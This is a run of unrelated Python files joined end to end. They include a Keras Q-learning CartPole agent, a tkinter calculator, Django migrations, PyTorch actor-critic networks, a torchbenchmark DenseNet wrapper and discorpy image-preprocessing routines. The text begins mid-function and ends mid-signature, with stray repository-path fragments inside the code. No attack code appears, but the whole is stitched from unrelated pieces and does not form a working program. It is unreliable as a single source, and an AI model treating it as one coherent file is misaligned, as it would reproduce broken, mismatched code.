b1, b2 = torch.chunk(direction, 2) fliplr = torch.tensor([[-1, +1]], dtype=direction.dtype, device=direction.device) x: Tensor = torch.stack( [F.normalize(b1), F.normalize(b2 * fliplr),] ) return _deaugment_averaging(x, reduction=reduction) # -*- coding: utf-8 -*- """Material used to generate and execute bindings generated by the PyXB package. """ # Automatically include all the stuff that's necessary for basic # running. There are order dependencies here. from . import basis from . import datatypes from . import facets from . import content # Do not include the stuff that's required only for code generation # noimport generate Reinforcement learning/approx_q.py0 # Build a neural network for approximate Q learning import gym import numpy as np import pandas as pd import matplotlib.pyplot as plt import tensorflow as tf import keras import keras.layers as L def get_action(state, epsilon=0): """ sample actions with epsilon-greedy policy recap: with p = epsilon pick random action, else pick action with highest Q(s,a) """ q_values = network.predict(state[None])[0] exploration = np.random.random() if exploration < epsilon: action = np.random.choice(n_actions, 1)[0] else: action = np.argmax(q_values) return action def generate_session(t_max=1000, epsilon=0, train=False): """play env with approximate q-learning agent and train it at the same time""" total_reward = 0 s = env.reset() for t in range(t_max): a = get_action(s, epsilon=epsilon) next_s, r, done, _ = env.step(a) if train: sess.run(train_step, { states_ph: [s], actions_ph: [a], rewards_ph: [r], next_states_ph: [next_s], is_done_ph: [done] }) total_reward += r s = next_s if done: break return total_reward if __name__ == "__main__": # OpenAI gym CartPole-v0 example env = gym.make("CartPole-v0").env env.reset() n_actions = env.action_space.n state_dim = env.observation_space.shape tf.reset_default_graph() sess = tf.InteractiveSession() keras.backend.set_session(sess) network = keras.models.Sequential() network.add(L.InputLayer(state_dim)) # create a network for approximate q-learning following guidelines above network.add(L.Dense(100, activation='relu')) network.add(L.Dense(100, activation='relu')) network.add(L.Dense(n_actions, activation='linear')) # Q-learning via gradient descent - train the agent's Q-function by minimizing the TD loss # Create placeholders for the tuple and a special indicator for game end (is_done = True) states_ph = keras.backend.placeholder(dtype='float32', shape=(None,) + state_dim) actions_ph = keras.backend.placeholder(dtype='int32', shape=[None]) rewards_ph = keras.backend.placeholder(dtype='float32', shape=[None]) next_states_ph = keras.backend.placeholder(dtype='float32', shape=(None,) + state_dim) is_done_ph = keras.backend.placeholder(dtype='bool', shape=[None]) # get q-values for all actions in current states predicted_qvalues = network(states_ph) # select q-values for chosen actions predicted_qvalues_for_actions = tf.reduce_sum(predicted_qvalues * tf.one_hot(actions_ph, n_actions), axis=1) gamma = 0.99 # compute q-values for all actions in next states predicted_next_qvalues = network(next_states_ph) # compute V * (next_states) using predicted next q-values next_state_values = tf.reduce_max(predicted_next_qvalues, axis=1) # compute "target q-values" for loss - it's what's inside square parentheses in the above formula. target_qvalues_for_actions = rewards_ph + gamma * next_state_values # at the last state use simplified formula: Q(s,a) = r(s,a) since s' doesn't exist target_qvalues_for_actions = tf.where(is_done_ph, rewards_ph, target_qvalues_for_actions) # mean squared error loss to minimize loss = (predicted_qvalues_for_actions - tf.stop_gradient(target_qvalues_for_actions)) ** 2 loss = tf.reduce_mean(loss) # training function that resembles agent.update(state, action, reward, next_state) from tabular agent train_step = tf.train.AdamOptimizer(1e-4).minimize(loss) epsilon = 0.5 for i in range(1000): session_rewards = [generate_session(epsilon=epsilon, train=True) for _ in range(100)] print("epoch #{}\tmean reward = {:.3f}\tepsilon = {:.3f}".format(i, np.mean(session_rewards), epsilon)) epsilon *= 0.99 assert epsilon >= 1e-4, "Make sure epsilon is always nonzero during training" if np.mean(session_rewards) > 300: print("Iteration ended, session mean reward > 300") break from tkinter import * import parser w=5 #width of button h=2 #height of button border=0 #border of button root = Tk() root.title('Caculator') print('History of operations:') #get user input to text field i=0 def get_variables(num): global i display.insert(i,num) i+=1 #get user inputs of operations def get_operation(operator): global i op_len = len(operator) display.insert(i,operator) i+=op_len #resets to normal display def reset(): display.config(bg='White',fg='Black') #clear screen def clearAll(): display.delete(0,END) #backspace def delete(): disp_str= display.get() clearAll() display.insert(0,disp_str[:-1]) #OR display.delete(len(disp_str)-1,END) #calculate sequence def answer(): string= display.get() result = 'Error' try: a = parser.expr(string).compile() result = eval(a) clearAll() display.config(bg='Green',fg='White') display.insert(0,result) display.after(300,reset) except Exception: clearAll() display.config(bg='Red',fg='White') display.insert(0,'Error') display.after(300,reset) print(string + ' = ' + str(result)) #adding input field display = Entry(root) display.grid(row=1,columnspan=6,sticky=W+E) root.bind('', lambda _: answer()) #enter to claculate answer #adding number buttons Button(root,text='1',width=w, command = lambda :get_variables(1), bd=border,height=h).grid(row=2,column=0) Button(root,text='2',width=w, command = lambda :get_variables(2), bd=border,height=h).grid(row=2,column=1) Button(root,text='3', width=w, command = lambda :get_variables(3), bd=border,height=h).grid(row=2,column=2) Button(root,text='4', width=w, command = lambda :get_variables(4), bd=border,height=h).grid(row=3,column=0) Button(root,text='5', width=w, command = lambda :get_variables(5), bd=border,height=h).grid(row=3,column=1) Button(root,text='6', width=w, command = lambda :get_variables(6), bd=border,height=h).grid(row=3,column=2) Button(root,text='7', width=w, command = lambda :get_variables(7), bd=border,height=h).grid(row=4,column=0) Button(root,text='8', width=w, command = lambda :get_variables(8), bd=border,height=h).grid(row=4,column=1) Button(root,text='9', width=w, command = lambda :get_variables(9), bd=border,height=h).grid(row=4,column=2) #adding operator buttons Button(root, text='AC\n©Vasu', width=w, command=lambda :clearAll(), bd=border,height=h).grid(row=5,column=0) Button(root, text='0', width=w, command = lambda :get_variables(0), bd=border,height=h).grid(row=5,column=1) Button(root, text='=', width=w, command=lambda : answer(), bd=border,height=h).grid(row=5,column=2) Button(root, text='+', width=w, command=lambda : get_operation('+'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=2,column=3) Button(root, text='-', width=w, command=lambda : get_operation('-'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=3,column=3) Button(root, text='x', width=w, command=lambda : get_operation('*'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=4,column=3) Button(root, text='/', width=w, command=lambda : get_operation('/'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=5,column=3) #adding new operations Button(root, text='pi', width=w, command=lambda : get_operation('3.14'), bg='Grey',fg='White',bd=border,height=h).grid(row=2,column=4) Button(root, text='%', width=w, command=lambda : get_operation('%'), bg='Grey',fg='White',bd=border,height=h).grid(row=3,column=4) Button(root, text='(', width=w, command=lambda : get_operation('('), bg='Grey',fg='White',bd=border,height=h).grid(row=4,column=4) Button(root, text='exp', width=w, command=lambda : get_operation('**'), bg='Grey',fg='White',bd=border,height=h).grid(row=5,column=4) Button(root, text='del', width=w, command=lambda :delete(), bg='Grey',fg='White',bd=border,height=h).grid(row=2,column=5) Button(root, text='sqrt', width=w, command=lambda : get_operation('**0.5'), bg='Grey',fg='White',bd=border,height=h).grid(row=3,column=5) Button(root, text=')', width=w, command=lambda : get_operation(')'), bg='Grey',fg='White',bd=border,height=h).grid(row=4,column=5) Button(root, text='^2', width=w, command=lambda : get_operation('**2'), bg='Grey',fg='White',bd=border,height=h).grid(row=5,column=5) root.mainloop()# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-10-20 21:19 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Board', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('slug', models.SlugField(blank=True, unique=True)), ], ), migrations.CreateModel( name='Task', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.TextField()), ('status', models.CharField(choices=[(1, 'To be done'), (2, 'Work in progress'), (3, 'Done'), (4, 'Wish')], default=4, max_length=20)), ('due_date', models.DateField(blank=True, null=True)), ('start_date', models.DateField(blank=True, null=True)), ('end_date', models.DateField(blank=True, null=True)), ('creation_date', models.DateField(auto_now_add=True)), ('assignee', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ('board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='todo.Board')), ], ), ] ch8/function_approximator/deep.py0 import torch class Actor(torch.nn.Module): def __init__(self, input_shape, actor_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent Actor in an Actor-Critic algorithm The Policy is parametrized using a Gaussian distribution with mean mu and variance sigma The Actor's policy parameters (mu, sigma) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. Typically the shape of the actions :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(Actor, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64 * 7 * 7, 512), torch.nn.ReLU()) self.actor_mu = torch.nn.Linear(512, actor_shape) self.actor_sigma = torch.nn.Linear(512, actor_shape) def forward(self, x): """ Forward pass through the Actor network. Takes batch_size x observations as input and produces mu and sigma as the outputs :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) actor_mu = self.actor_mu(x) actor_sigma = self.actor_sigma(x) return actor_mu, actor_sigma class DiscreteActor(torch.nn.Module): def __init__(self, input_shape, actor_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent Actor in an Actor-Critic algorithm The Policy is parametrized using a categorical/discrete distribution with logits The Actor's policy parameters (logits) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. Typically the shape of the actions :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(DiscreteActor, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64 * 7 * 7, 512), torch.nn.ReLU()) self.logits = torch.nn.Linear(512, actor_shape) def forward(self, x): """ Forward pass through the Actor network. Takes batch_size x observations as input and produces mu and sigma as the outputs :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) logits = self.logits(x) return logits class Critic(torch.nn.Module): def __init__(self, input_shape, critic_shape=1, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent the Critic in an Actor-Critic algorithm :param input_shape: Shape of each of the observations :param critic_shape: Shape of the Critic's output. Typically 1 :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(Critic, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64* 7 * 7, 512), torch.nn.ReLU()) self.critic = torch.nn.Linear(512, critic_shape) def forward(self, x): """ Forward pass through the Critic network. Takes batch_size x observations as input and produces the value estimate as the output :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) critic = self.critic(x) return critic class ActorCritic(torch.nn.Module): def __init__(self, input_shape, actor_shape, critic_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent both policy (Actor) and a value function (Critic). The Policy is parametrized using a Gaussian distribution with mean mu and variance sigma The Actor's policy parameters (mu, sigma) and the Critic's Value (value) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. Typically the shape of the actions :param critic_shape: Shape of the Critic's output. Typically 1 :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(ActorCritic, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64* 7 * 7, 512), torch.nn.ReLU()) self.actor_mu = torch.nn.Linear(512, actor_shape) self.actor_sigma = torch.nn.Linear(512, actor_shape) self.critic = torch.nn.Linear(512, critic_shape) def forward(self, x): """ Forward pass through the Actor-Critic network. Takes batch_size x observations as input and produces mu, sigma and the value estimate as the outputs :param x: The observations :return: Mean (actor_mu), Sigma (actor_sigma) for a Gaussian policy and the Critic's value estimate (critic) """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) actor_mu = self.actor_mu(x) actor_sigma = self.actor_sigma(x) critic = self.critic(x) return actor_mu, actor_sigma, critic from torchbenchmark.util.framework.vision.model_factory import TorchVisionModel from torchbenchmark.tasks import COMPUTER_VISION class Model(TorchVisionModel): task = COMPUTER_VISION.CLASSIFICATION # Train batch size: use the training batch in paper. # Source: https://arxiv.org/pdf/1608.06993.pdf DEFAULT_TRAIN_BSIZE = 256 DEFAULT_EVAL_BSIZE = 64 def __init__(self, test, device, jit=False, batch_size=None, extra_args=[]): super().__init__(model_name="densenet121", test=test, device=device, jit=jit, batch_size=batch_size, extra_args=extra_args) #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Nov 10 16:02:37 2019 @author: tyler """ from cnn import build_cnn is_training = True batch_size = 7 height = 32 width = 256 channels = 1 o,i =build_cnn(is_training, batch_size, height, width, channels)OKThess/website # -*- coding: utf-8 -*- # Generated by Django 1.11.5 on 2018-06-21 16:19 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0064_weekendapplication'), ] operations = [ migrations.AddField( model_name='weekendapplication', name='accept_terms', field=models.BooleanField(default=False), ), migrations.AddField( model_name='weekendapplication', name='email', field=models.EmailField(default='', max_length=254), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='first_name', field=models.TextField(default='first_name'), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='last_name', field=models.TextField(default='last_name'), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='specialization', field=models.TextField(default='specialization'), preserve_default=False, ), ] # ============================================================================ # Copyright (c) 2018 Diamond Light Source Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ # Author: # E-mail: # Publication date: 21 November 2021 # ============================================================================ # Contributors: # ============================================================================ """ Module of pre-processing methods for handling a line-pattern image: - Determine the slopes and distances between lines. - Extract points belong to a line. - Convert a chessboard image to a line-pattern image. """ import numpy as np import scipy.ndimage as ndi from skimage.transform import radon import discorpy.prep.preprocessing as prep def locate_subpixel_point(list_point, option="min"): """ Locate the extremum point of a 1D array with subpixel accuracy. Parameters ---------- list_point : array_like 1D array. option : {"min", "max"} To locate the minimum point or the maximum point. Returns ------- float Subpixel position of the extremum point. """ num_point = len(list_point) a, b, c = np.polyfit(np.arange(num_point), list_point, 2) if option == "min": pos = np.argmin(list_point) else: pos = np.argmax(list_point) if a != 0.0: num = - b / (2 * a) if (num >= 0) and (num < num_point): pos = num return pos def get_local_extrema_points(list_data, option="min", radius=7, sensitive=0.1, denoise=True, norm=True, subpixel=True): """ Get a list of local extremum points from a 1D array. Parameters ---------- list_data : array_like 1D array. option : {"min", "max"} To get minimum points or maximum points radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. norm : bool, optional Apply background normalization to the array. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like 1D array. Positions of local extremum points. """ if denoise is True: list_data = ndi.gaussian_filter(list_data, 3) num_point = len(list_data) radius = np.clip(radius, 1, num_point // 4) if norm is True: xlist = np.arange(num_point) mat_comb = np.asarray(np.vstack((xlist, list_data))) mat_sort = mat_comb[:, mat_comb[1, :].argsort()] list_sort = mat_sort[1] ndrop = int(0.25 * num_point) (a1, a0) = np.polyfit(xlist[ndrop:-ndrop - 1], list_sort[ndrop:-ndrop - 1], 1) list_fit = a1 * xlist + a0 l_thres, u_thres = a0, a1 * xlist[-1] + a0 list_sort[(list_fit >= l_thres) & (list_fit <= u_thres)] = list_fit[ (list_fit >= l_thres) & (list_fit <= u_thres)] mat_sort[1] = list_sort nmean = np.mean(np.abs(list_fit)) backgr = mat_sort[:, mat_sort[0, :].argsort()][1] list_data = np.divide(list_data, backgr, out=nmean * np.ones_like(list_data), where=backgr != 0) points = [] for i in range(radius, num_point - radius - 1, 1): val, pos = list_data[i], i if option == "max": list_sort = np.sort(list_data[i - radius:i + radius + 1]) num1 = list_sort[-1] - val nmean = np.mean(list_sort[:radius + 1]) num2 = np.abs((val - nmean) / nmean) if nmean != 0 else 0.0 if (num1 == 0.0) and (num2 > sensitive): if subpixel is True: pos = i - 1 + locate_subpixel_point(list_data[i - 1:i + 2], option=option) points.append(pos) else: list_sort = np.sort(list_data[i - radius:i + radius + 1]) num1 = list_sort[0] - val nmean = np.mean(list_sort[-radius:]) num2 = np.abs((val - nmean) / nmean) if nmean != 0 else 0.0 if (num1 == 0.0) and (num2 > sensitive): if subpixel is True: pos = i - 1 + locate_subpixel_point(list_data[i - 1:i + 2], option=option) points.append(pos) return np.asarray(points) def _make_circle_mask(width, ratio): """ Create a circle mask. Parameters ----------- width : int Width of a square array. ratio : float Ratio between the diameter of the mask and the width of the array. Returns ------ array_like Square array. """ mask = np.zeros((width, width), dtype=np.float32) center = width // 2 radius = ratio * center y, x = np.ogrid[-center:width - center, -center:width - center] mask_check = x * x + y * y <= radius * radius mask[mask_check] = 1.0 return mask def calc_slope_distance_hor_lines(mat, ratio=0.3, search_range=30.0, radius=9, sensitive=0.1, bgr="bright", denoise=True, norm=True, subpixel=True): """ Calculate the representative distance between horizontal lines and the representative slope of these lines using the ROI around the middle of a line-pattern image. Parameters ---------- mat : array_like 2D array. ratio : float Used to select the ROI around the middle of an image. search_range : float Search range in Degree to determine the slope of lines. radius : int Search radius. Used to locate lines. sensitive : float To detect lines against random noise. Smaller is more sensitive. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. denoise : bool, optional Applying a smoothing filter if True. norm : bool, optional Apply background normalization to the array. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- slope : float Slope of horizontal lines in Radian. distance : float Distance between horizontal lines. """ if denoise is True: mat = ndi.gaussian_filter(mat, 3) mat_roi = prep._select_roi(mat, ratio, square=True) if bgr == "bright": mat_roi = np.max(mat_roi) - mat_roi angle_coarse = 90.0 + np.arange(-search_range, search_range + 1.0) mask = _make_circle_mask(mat_roi.shape[0], 0.92) sinogram1 = radon(mat_roi * mask, theta=angle_coarse, circle=True) list_max1 = np.amax(sinogram1, axis=0) pos_max1 = np.argmax(list_max1) best_angle1 = angle_coarse[pos_max1] angle_fine = np.arange(best_angle1 - 1.0, best_angle1 + 1.05, 0.05) sinogram2 = radon(mat_roi * mask, theta=angle_fine, circle=True) list_max2 = np.amax(sinogram2, axis=0) pos_max2 = np.argmax(list_max2) best_angle2 = -(angle_fine[pos_max2] - 90) slope = np.tan(best_angle2 * np.pi / 180.0) list_ext_point = get_local_extrema_points(sinogram2[:, pos_max2], option="max", radius=radius, denoise=denoise, norm=norm, subpixel=subpixel, sensitive=sensitive) if len(list_ext_point) > 3: distance = np.median(np.abs(np.diff(list_ext_point))) else: distance = np.mean(np.abs(np.diff(list_ext_point))) return slope, distance def calc_slope_distance_ver_lines(mat, ratio=0.3, search_range=30.0, radius=9, sensitive=0.1, bgr="bright", denoise=True, norm=True, subpixel=True): """ Calculate the representative distance between vertical lines and the representative slope of these lines using the ROI around the middle of a line-pattern image. Parameters ---------- mat : array_like 2D array. ratio : float Used to select the ROI around the middle of an image. search_range : float Search range in Degree to determine the slope of lines. radius : int Search radius. Used to locate lines. sensitive : float To detect lines against random noise. Smaller is more sensitive. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- slope : float Slope of vertical lines in Radian. distance : float Distance between vertical lines. """ if denoise is True: mat = ndi.gaussian_filter(mat, 3) mat_roi = prep._select_roi(mat, ratio, square=True) if bgr == "bright": mat_roi = np.max(mat_roi) - mat_roi angle_coarse = np.arange(-search_range, search_range + 1.0) mask = _make_circle_mask(mat_roi.shape[0], 0.92) sinogram1 = radon(mat_roi * mask, theta=angle_coarse, circle=True) list_max1 = np.amax(sinogram1, axis=0) pos_max1 = np.argmax(list_max1) best_angle1 = angle_coarse[pos_max1] angle_fine = np.arange(best_angle1 - 1.0, best_angle1 + 1.05, 0.05) sinogram2 = radon(mat_roi * mask, theta=angle_fine, circle=True) list_max2 = np.amax(sinogram2, axis=0) pos_max2 = np.argmax(list_max2) best_angle2 = angle_fine[pos_max2] slope = np.tan(best_angle2 * np.pi / 180.0) list_ext_point = get_local_extrema_points(sinogram2[:, pos_max2], option="max", radius=radius, denoise=denoise, norm=norm, subpixel=subpixel, sensitive=sensitive) if len(list_ext_point) > 3: distance = np.median(np.abs(np.diff(list_ext_point))) else: distance = np.mean(np.abs(np.diff(list_ext_point))) return slope, distance def _calc_index_range(height, width, angle_deg, direction): """ Calculate extractable range of tilted line-profile. Positive angle is counterclockwise. Parameters ---------- height : int Height of the image. width : int Width of the image. angle_deg : float Tilted angle in Degree. direction : {"horizontal", "vertical"} Direction of line-profile. Returns ------- min_idx : int Minimum index of lines. max_idx : int Maximum index of lines. """ angle = angle_deg * np.pi / 180.0 if direction == "horizontal": if np.abs(angle_deg) == 90.0: raise ValueError("If the input angle is around 90-degree, use " "the 'vertical' option and update the angle to " "around 0-degree instead!!!") else: if angle_deg > 0: min_idx = int(np.ceil(width * np.tan(angle))) max_idx = height - 1 else: min_idx = 0 max_idx = height - 1 - int( np.floor(width * np.tan(np.abs(angle)))) if (min_idx < 0) or (min_idx >= height) or (max_idx < 0) or ( max_idx >= height): raise ValueError("Row index is out of range, please select " "the direction correctly !!!") else: if np.abs(angle_deg) == 90.0: raise ValueError("If the input angle is around 90-degree, use " "the 'horizontal' option and update the angle to " "around 0-degree instead!!!") else: if angle_deg > 0: min_idx = 0 max_idx = width - 1 - int(np.ceil(height * np.tan(angle))) else: min_idx = int(np.floor(height * np.tan(np.abs(angle)))) max_idx = width - 1 if (min_idx < 0) or (min_idx >= width) or (max_idx < 0) or ( max_idx >= width): raise ValueError("Column index is out of range, please select " "the direction correctly !!!") return min_idx, max_idx def get_tilted_profile(mat, index, angle_deg, direction): """ Get the intensity-profile along a tilted line across an image. Positive angle is counterclockwise. Parameters ---------- mat : array_like 2D array. index : int Index of the line. angle_deg : float Tilted angle in Degree. direction : {"horizontal", "vertical"} Direction of line-profile. Returns ------- xlist : array_like 1D array. x-positions of points on the line. ylist : array_like 1D array. y-positions of points on the line. profile : array_like 1D array. Intensities of points on the line. """ if mat.ndim != 2: raise ValueError("Input must be a 2D array !!!") (height, width) = mat.shape (min_idx, max_idx) = _calc_index_range(height, width, angle_deg, direction) angle = angle_deg * np.pi / 180.0 if (index < min_idx) or (index > max_idx): raise ValueError("Input index is out of possible range: " "[{0}, {1}]".format(min_idx, max_idx)) if direction == "horizontal": rlist = np.linspace(0, np.floor(width / np.cos(angle)), width) xlist = rlist * np.cos(angle) ylist = rlist * np.sin(-angle) xlist = np.clip(xlist, 0, width - 1) ylist = np.clip(index + ylist, 0, height - 1) ymin = np.int16(np.floor(np.amin(ylist))) ymax = np.int16(np.ceil(np.amax(ylist))) + 1 indices = ylist - ymin, xlist profile = ndi.map_coordinates(mat[ymin:ymax, :], indices, order=3, mode='nearest') else: rlist = np.linspace(0, np.floor(height / np.cos(angle)), height) ylist = rlist * np.cos(angle) xlist = rlist * np.sin(angle) xlist = np.clip(index + xlist, 0, width - 1) ylist = np.clip(ylist, 0, height - 1) xmin = np.int16(np.floor(np.amin(xlist))) xmax = np.int16(np.ceil(np.amax(xlist))) + 1 indices = ylist, xlist - xmin profile = ndi.map_coordinates(mat[:, xmin:xmax], indices, order=3, mode='nearest') return xlist, ylist, profile def get_cross_points_hor_lines(mat, slope_ver, dist_ver, ratio=1.0, norm=True, offset=0, bgr="bright", radius=7, sensitive=0.1, denoise=True, subpixel=True): """ Get points on horizontal lines of a line-pattern image by intersecting with a list of generated vertical-lines. Parameters ---------- mat : array_like 2D array. slope_ver : float Slope in Radian of generated vertical lines. dist_ver : float Distance between two adjacent generated lines. ratio : float To adjust the distance between generated lines to get more/less lines. norm : bool, optional Apply background normalization to the array. offset : int Starting index of generated lines. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like List of (y,x)-coordinates of points. """ (height, width) = mat.shape if bgr == "bright": mat = np.max(mat) - mat if norm is True: mat = prep.normalization_fft(mat, 5) if denoise is True: mat = ndi.gaussian_filter(mat, 3) angle = np.arctan(slope_ver) min_row, max_row = _calc_index_range(height, width, np.rad2deg(angle), direction="vertical") offset = np.clip(offset, 0, min(height, width) // 3) list_points = [] for i in np.arange(min_row + offset, max_row - offset, ratio * dist_ver): xlist, ylist, profile = get_tilted_profile(mat, i, np.rad2deg(angle), direction="vertical") scale = np.sqrt((xlist[-1] - xlist[0]) ** 2 + (ylist[-1] - ylist[0]) ** 2) / (height - 1) rlist = get_local_extrema_points(profile, option="max", radius=radius, sensitive=sensitive, denoise=not denoise, norm=not norm, subpixel=subpixel) * scale xlist1 = rlist * np.sin(angle) + xlist[0] ylist1 = rlist * np.cos(angle) + ylist[0] list_points.extend(np.asarray(list(zip(ylist1, xlist1)))) return np.asarray(list_points) def get_cross_points_ver_lines(mat, slope_hor, dist_hor, ratio=1.0, norm=True, offset=0, bgr="bright", radius=7, sensitive=0.1, denoise=True, subpixel=True): """ Get points on vertical lines of a line-pattern image by intersecting with a list of generated horizontal-lines. Parameters ---------- mat : array_like 2D array. slope_hor : float Slope in Radian of generated horizontal lines. dist_hor : float Distance between two adjacent generated lines. ratio : float To adjust the distance between generated lines to get more/less lines. norm : bool, optional Apply background normalization to the array. offset : int Starting index of generated lines. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like List of (y,x)-coordinates of points. """ (height, width) = mat.shape if bgr == "bright": mat = np.max(mat) - mat if norm is True: mat = prep.normalization_fft(mat, 5) if denoise is True: mat = ndi.gaussian_filter(mat, 3) angle = np.arctan(slope_hor) min_col, max_col = _calc_index_range(height, width, -np.rad2deg(angle), direction="horizontal") offset = np.clip(offset, 0, min(height, width) // 8) list_points = [] for i in np.arange(min_col + offset, max_col - offset, ratio * dist_hor): xlist, ylist, profile = get_tilted_profile(mat, i, -np.rad2deg(angle), direction="horizontal") scale = np.sqrt((xlist[-1] - xlist[0]) ** 2 + (ylist[-1] - ylist[0]) ** 2) / (width - 1) rlist = get_local_extrema_points(profile, option="max", radius=radius, sensitive=sensitive, denoise=not denoise, norm=not norm, subpixel=subpixel) * scale xlist1 = rlist * np.cos(angle) + xlist[0] ylist1 = rlist * np.sin(angle) + ylist[0] list_points.extend(np.asarray(list(zip(ylist1, xlist1)))) return np.asarray(list_points) def convert_chessboard_to_linepattern(mat, smooth=False, bgr="bright"): """ Convert a chessboard image to a line-pattern image. Parameters ---------- mat : array_like 2D array. smooth : bool, optional Apply a gaussian smoothing filter if True. bgr : {'bright', 'dark'} Select the background of the output image. Returns ------- array_like Line-pattern image. """ if smooth is True: mat = ndi.gaussian_filter(mat, 1, mode="nearest") mat_line = np.mean(np.abs(np.gradient(mat)), axis=0) if smooth is True: mat_line = np.pad(mat_line[4:-4, 4:-4], 4, mode="edge") else: mat_line = np.pad(mat_line[2:-2, 2:-2], 2, mode="edge") if bgr == "bright": mat_line = np.max(mat_line) - mat_line mat_line = mat_line / np.mean(np.abs(mat_line)) return mat_line 10-100 import logging from time import time log = logging.getLogger(__name__) class Timer(): def __init__(self, debug_msg=None): self._start = time() self._laps = [] self._last_lap = 0 self._lap_control = self._start self._stopped = 0 if debug_msg: log.debug(debug_msg) def lap(self, 